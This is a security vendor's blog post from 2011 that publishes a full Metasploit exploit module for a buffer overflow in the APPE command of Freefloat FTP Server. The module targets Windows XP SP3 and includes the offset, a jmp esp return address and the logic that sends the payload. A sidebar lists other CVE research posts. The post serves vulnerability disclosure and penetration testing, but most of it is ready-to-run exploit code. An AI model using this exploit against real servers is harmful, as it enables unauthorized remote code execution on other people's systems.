SecPod

Learn Search

Search across all Learn content

← Back to Security Research

Metasploit Module – Freefloat FTP Server APPE Command Overflow

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for Freefloat FTP Server APPE Command Overflow Vulnerability.

Sep 6, 2011By Veerendra GG2 min read

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for Freefloat FTP Server APPE Command Overflow Vulnerability.

Metasploit :

plaintext

##
# $Id: freefloat_ftp_apee_cmd.rb 2011-07-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking

    include Msf::Exploit::Remote::Ftp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Freefloat FTP Server APPE Command Overflow',
            'Description'    => %q{
                    This module exploits a buffer overflow vulnerability
                    found in the APPE command in the Freefloat FTP server.
            },
            'Author'         =>
                [
                    'veerendragg @ SecPod', # Initial Discovery
                    'veerendragg @ SecPod'  # Metasploit Module
                ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 1.0 $',
            'References'     =>
                [
                    [ 'URL', 'https://www.secpod.com/blog/?p=310' ],
                    [ 'URL', 'https://www.secpod.com/blog/?p=353' ],
                    [ 'URL', 'http://secpod.org/msf/freefloat_ftp_apee_cmd.rb'],
                    [ 'URL', 'http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt'],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space' => 500,
                    'BadChars' => "\x00\x0a\x0d",
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [
                        'Windows XP SP3 EN',
                        {
                            'Ret' => 0x7e429353, # jmp esp from user32.dll
                            'Offset' => 246
                        }
                    ],
                ],
            'DisclosureDate' => 'Aug 07 2011',
            'DefaultTarget' => 0))
    end

    def exploit
        connect_login
        print_status("Trying target #{target.name}...")
        buf = make_nops(target['Offset'])
        buf << [target.ret].pack('V')
        buf << make_nops(30)
        buf << payload.encoded

        print_status("Sending exploit buffer...")
        send_cmd( ['APPE', buf] , false )

        handler
        disconnect
    end

end

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

Featured Posts

Open CVE-2026-31431: From 732 Bytes to Root - Anatomy of a Modern Linux Privilege Escalation

CVE-2026-31431: From 732 Bytes to Root - Anatomy of a Modern Linux Privilege Escalation

CVE Research

CVE-2026-31431: From 732 Bytes to Root - Anatomy of a Modern Linux Privilege Escalation

Jun 24, 2026

Open CVE-2026-31431: The Nine-Year Kernel Bug Hiding in Plain Sight

CVE-2026-31431: The Nine-Year Kernel Bug Hiding in Plain Sight

CVE Research

CVE-2026-31431: The Nine-Year Kernel Bug Hiding in Plain Sight

Jun 23, 2026

Open Squidbleed: A 29-Year-Old Squid Proxy Flaw That Leaks Cleartext HTTP Requests
Squidbleed: A 29-Year-Old Squid Proxy Flaw That Leaks Cleartext HTTP Requests

CVE Research

Squidbleed: A 29-Year-Old Squid Proxy Flaw That Leaks Cleartext HTTP Requests

Jun 23, 2026

Open AryStinger Malware Leverages 4,300+ Legacy Routers to Establish Persistent Spy Infrastructure
AryStinger Malware Leverages 4,300+ Legacy Routers to Establish Persistent Spy Infrastructure

CVE Research

AryStinger Malware Leverages 4,300+ Legacy Routers to Establish Persistent Spy Infrastructure

AryStinger represents a calculated shift in IoT threat methodology, abandoning noisy, destructive payloads in favor of silent, long-term reconnaissance infrastructure. By exploiting unpatched, end-of-life routers and NAS devices through decade-old vulnerabilities, the threat operator has assembled a distributed fleet of over 4,300 Executor nodes capable of conducting parallelized DNS enumeration, port scanning, and service fingerprinting at scale, all while masking origin behind residential IP addresses. With active development ongoing and a potential operational timeline stretching back to 2024, AryStinger underscores a growing and underappreciated risk: forgotten edge hardware is not merely a compliance gap but exploitable infrastructure.

Jun 23, 2026

Metasploit Module – Freefloat FTP Server APPE Command Overflow | SecPod